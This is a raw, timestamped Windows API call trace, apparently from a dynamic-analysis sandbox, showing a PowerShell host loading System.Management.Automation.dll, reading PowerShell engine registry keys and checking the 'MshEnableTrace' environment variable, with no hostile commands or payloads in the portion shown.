	[0852.863] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dacc, lpData=0x1b849cf0, lpcbData=0x12dac8*=0x56 | out: lpType=0x12dacc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dac8*=0x56) returned 0x0
	[0852.863] CoTaskMemFree (pv=0x1b849cf0) 
	[0852.864] RegCloseKey (hKey=0x380) returned 0x0
	[0852.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.874] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0852.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.874] CoTaskMemFree (pv=0x2a6660) 
	[0852.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0852.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0854.510] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0854.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.510] CoTaskMemFree (pv=0x2a6660) 
	[0855.589] VirtualQuery (in: lpAddress=0x12bbd0, lpBuffer=0x12ca90, dwLength=0x30 | out: lpBuffer=0x12ca90*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0855.618] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0855.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.618] CoTaskMemFree (pv=0x2a6660) 
	[0855.619] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0855.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.619] CoTaskMemFree (pv=0x2a6660) 
	[0855.619] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0855.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.620] CoTaskMemFree (pv=0x2a6660) 
	[0855.621] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0855.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.621] CoTaskMemFree (pv=0x2a6660) 
	[0855.625] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0855.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.626] CoTaskMemFree (pv=0x2a6660) 
	[0855.626] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0855.626] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0855.626] CoTaskMemFree (pv=0x2a6660) 
	[0858.324] CoTaskMemAlloc (cb=0x104) returned 0x2a6660
	[0858.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6660, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0858.324] CoTaskMemFree (pv=0x2a6660) 
	[0862.500] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2a6aa0
	[0862.503] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2a6bb0
	[0868.125] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.125] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.125] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.127] CoTaskMemAlloc (cb=0x104) returned 0x2a6cc0
	[0868.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a6cc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0868.128] CoTaskMemFree (pv=0x2a6cc0) 
	[0868.138] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dcd8 | out: phkResult=0x12dcd8*=0x388) returned 0x0
